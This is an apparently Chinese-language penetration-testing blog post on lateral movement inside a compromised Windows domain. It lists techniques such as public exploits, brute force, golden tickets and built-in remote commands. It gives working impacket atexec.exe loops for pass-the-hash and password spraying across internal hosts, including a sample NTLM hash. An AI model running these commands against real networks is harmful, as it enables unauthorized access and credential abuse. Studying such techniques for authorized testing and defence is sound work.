前言
当拿到某域内的一台机器后,需要进一步的扩大战果,这时候就需要进行横向移动,横向移动这部分的技术的都是基于信息收集的结果才能实现,信息收集很重要,切记。
推荐几种实现方式:
- 利用现有exp来对操作系统进行攻击,例如ms17010,ms08067等。
- 利用密码爆破ssh或者对smb服务进行爆破,可利用impacket工具实现。
- 利用服务端应用的rce漏洞,如tomcat等中间件漏洞。
- 制作黄金票据进行横向移动,可利用impacket与mimikatz工具实现。
- 利用windows的自带命令远控对方主机。
- 对敏感端口进行攻击。
实现
利用exp来对操作系统进行攻击
这部分主要靠积累,根据对方的操作系统在网上下载对应的exp进行攻击,当然能写exp也行。
利用密码爆破
倘若要攻击linux主机的话,ssh爆破是个好方法,这个可以自己写python脚本实现比较简单。
倘若是攻击windows主机也可以采用密码爆破,具体实现方法是利用impacket工具实现:
内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条 FOR /F %i in (ips.txt) do
atexec.exe -hashes :3dbde697d71690a769204beb12283678
./administrator@%i whoami
指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条 FOR /F %i in
(hashes.txt) do atexec.exe -hashes %i ./[email protected]
whoami
文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条 FOR /F %i in (passwords.txt) do
atexec.exe ./administrator:%[email protected] whoami
指定主机密码遍历验证,ips.txt内容为内网ip,每段一条 FOR /F %i in (ips.txt) do atexec.exe
./administrator:123@%i whoami
更详细的信息请看我的这篇impacket命令总结。
利用服务端应用的漏洞
这部分例子很多后面会陆陆续续出文章来讲解。
黄金票据
黄金票据相关技术请看我的这篇文章:
利用windows的自带命令远控对方主机
下面两篇文章对其进行了比较详细的讲述:
对敏感端口进行攻击
可以先看看我的这篇敏感端口的常见攻击方式,后续会写具体文章来讲对应的知识点。
附录:后渗透信息收集
我的这两篇文章对其做了总结: